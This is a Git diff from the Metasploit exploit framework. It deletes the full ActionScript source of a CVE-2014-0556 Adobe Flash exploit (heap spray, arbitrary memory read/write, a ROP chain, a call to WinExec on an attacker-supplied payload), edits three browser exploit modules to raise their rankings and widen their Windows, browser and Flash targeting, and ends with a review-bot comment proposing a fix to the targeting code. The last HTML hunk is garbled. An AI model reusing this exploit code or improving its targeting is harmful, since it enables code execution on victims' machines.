diff --git a/data/exploits/CVE-2014-0556/msf.swf b/data/exploits/CVE-2014-0556/msf.swf
old mode 100755
new mode 100644
index f6483bd087..3cf2bc3d4f
Binary files a/data/exploits/CVE-2014-0556/msf.swf and b/data/exploits/CVE-2014-0556/msf.swf differ
diff --git a/external/source/exploits/CVE-2014-0556/Main.as b/external/source/exploits/CVE-2014-0556/Main.as
deleted file mode 100755
index da6482075c..0000000000
--- a/external/source/exploits/CVE-2014-0556/Main.as
+++ /dev/null
@@ -1,185 +0,0 @@ -// Build how to: -// 1. Download the AIRSDK, and use its compiler. -// 2. Download the Flex SDK (4.6) -// 3. Copy the Flex SDK libs (/framework/libs) to the AIRSDK folder (/framework/libs) -// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) -// 4. Build with: mxmlc -o msf.swf Main.as - -// Original code by @hdarwin89 // http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/ -// Modified to be used from msf - -package -{ - import flash.display.Sprite - import flash.display.BitmapData - import flash.geom.Rectangle - import flash.utils.ByteArray - import flash.display.LoaderInfo - import mx.utils.Base64Decoder - - public class Main extends Sprite - { - private var bv:Vector. = new Vector.(12800) - private var uv:Vector. = new Vector.(12800) - private var bd:BitmapData = new BitmapData(128, 16) - private var i:uint = 0 - - public function Main() - { - var b64:Base64Decoder = new Base64Decoder() - var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh - var pattern:RegExp = / /g; - b64_payload = b64_payload.replace(pattern, "+") - b64.decode(b64_payload) - var payload:String = b64.toByteArray().toString() - - for (i = 0; i < bv.length; i++) { - bv[i] = new ByteArray() - bv[i].length = 0x2000 - bv[i].position = 0xFFFFF000 - } - - for (i = 0; i < bv.length; i++) - if (i % 2 == 0) bv[i] = null - - for (i = 0; i < uv.length; i++) { - uv[i] = new Vector.(1022) - } - - bd.copyPixelsToByteArray(new Rectangle(0, 0, 128, 16), bv[6401]) - - for (i = 0; ; i++) - if (uv[i].length == 0xffffffff) break - - for (var i2:uint = 1; i2 < uv.length; i2++) { - if (i == i2) continue - uv[i2] = new Vector.(1014) - uv[i2][0] = bv[6401] - uv[i2][1] = this - } - - uv[i][0] = uv[i][0xfffffc03] - 0x18 + 0x1000 - bv[6401].endian = "littleEndian" - bv[6401].length = 0x500000 - var buffer:uint = vector_read(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) + 0x100000 - var main:uint = uv[i][0xfffffc09] - 1 - var vtable:uint = 
vector_read(main) - vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) - vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 16, 0xffffffff) - byte_write(uv[i][0] + 4, byte_read(uv[i][0] - 0x1000 + 8)) - byte_write(uv[i][0]) - - var flash:uint = base(vtable) - var winmm:uint = module("winmm.dll", flash) - var kernel32:uint = module("kernel32.dll", winmm) - var virtualprotect:uint = procedure("VirtualProtect", kernel32) - var winexec:uint = procedure("WinExec", kernel32) - var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash) - var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash) - - byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable - byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main - byte_write(0, "\x89\x03", false) // mov [ebx], eax - byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret - - byte_write(buffer + 0x100, payload, true) - byte_write(buffer + 0x20070, xchgeaxespret) - byte_write(buffer + 0x20000, xchgeaxesiret) - byte_write(0, virtualprotect) - - // VirtualProtect - byte_write(0, winexec) - byte_write(0, buffer + 0x30000) - byte_write(0, 0x1000) - byte_write(0, 0x40) - byte_write(0, buffer + 0x80) - - // WinExec - byte_write(0, buffer + 0x30000) - byte_write(0, buffer + 0x100) - byte_write(0) - - byte_write(main, buffer + 0x20000) - this.toString() - } - - private function vector_write(addr:uint, value:uint = 0):void - { - addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] = value : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] = value - } - - private function vector_read(addr:uint):uint - { - return addr > uv[i][0] ? 
uv[i][(addr - uv[i][0]) / 4 - 2] : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] - } - - private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void - { - if (addr) bv[6401].position = addr - if (value is String) { - for (var i:uint; i < value.length; i++) bv[6401].writeByte(value.charCodeAt(i)) - if (zero) bv[6401].writeByte(0) - } else bv[6401].writeUnsignedInt(value) - } - - private function byte_read(addr:uint, type:String = "dword"):uint - { - bv[6401].position = addr - switch(type) { - case "dword": - return bv[6401].readUnsignedInt() - case "word": - return bv[6401].readUnsignedShort() - case "byte": - return bv[6401].readUnsignedByte() - } - return 0 - } - - private function base(addr:uint):uint - { - addr &= 0xffff0000 - while (true) { - if (byte_read(addr) == 0x00905a4d) return addr - addr -= 0x10000 - } - return 0 - } - - private function module(name:String, addr:uint):uint - { - var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1 - while (true) { - var entry:uint = byte_read(iat + (++i) * 0x14 + 12) - if (!entry) throw new Error("FAIL!"); - bv[6401].position = addr + entry - if (bv[6401].readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break - } - return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))) - } - - private function procedure(name:String, addr:uint):uint - { - var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) - var numberOfNames:uint = byte_read(eat + 0x18) - var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) - var addressOfNames:uint = addr + byte_read(eat + 0x20) - var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) - for (var i:uint = 0; ; i++) { - var entry:uint = byte_read(addressOfNames + i * 4) - bv[6401].position = addr + entry - if (bv[6401].readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break - } - return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) - } - - private 
function gadget(gadget:String, hint:uint, addr:uint):uint
- {
- var find:uint = 0
- var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
- var value:uint = parseInt(gadget, 16)
- for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
- return addr + i
- }
- }
-}
diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
index f95e2f8dba..1182b2f2b7 100644
--- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
+++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
- Rank = NormalRanking
+ Rank = GreatRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
index 2b401c731b..fccecf14f9 100644
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
- Rank = NormalRanking
+ Rank = GreatRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
index dfae2693d6..77e8ce5cbe 100644
--- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
+++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
@@ -6,9 +6,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
- Rank = NormalRanking
+ Rank = GreatRanking
- include Msf::Exploit::Powershell
 include Msf::Exploit::Remote::BrowserExploitServer
 def initialize(info={})
@@ -47,9 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote
 'BrowserRequirements' =>
 {
 :source => /script|headers/i,
- :os_name => OperatingSystems::Match::WINDOWS_7,
- :ua_name => Msf::HttpClients::IE,
- :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') },
+ :os_name => lambda do |os|
+ os =~ OperatingSystems::Match::WINDOWS_7 ||
+ os =~ OperatingSystems::Match::WINDOWS_81
+ end,
+ :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+ :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.179') },
 :arch => ARCH_X86
 },
 'Targets' =>
@@ -82,17 +84,18 @@ class Metasploit3 < Msf::Exploit::Remote
 def exploit_template(cli, target_info)
 swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
 target_payload = get_payload(cli, target_info)
- psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
- b64_payload = Rex::Text.encode_base64(psh_payload)
+ b64_payload = Rex::Text.encode_base64(target_payload)
+ platform_id = 'win'
+ os_name = target_info[:os_name]
 html_template = %Q| - + - +
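Review bot: The new `:flash` lambda in the BrowserRequirements hunk calls `Gem::Version.new(ver)` on the client-reported version string, and `Gem::Version.new` raises ArgumentError on a malformed value (stray whitespace or a non-version suffix), so a non-conforming client errors out inside requirement matching rather than simply failing the check; the preceding `ver =~ /^14\./` only confirms the prefix. Guarding with the well-formedness test keeps the predicate total: `:flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.correct?(ver) && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.179') },`. The same construction was already on the removed line, so this is pre-existing rather than introduced by the commit, but the rewrite is the natural place to fix it. The hash holding these requirements (presumably the `initialize` body) starts and ends outside the hunk.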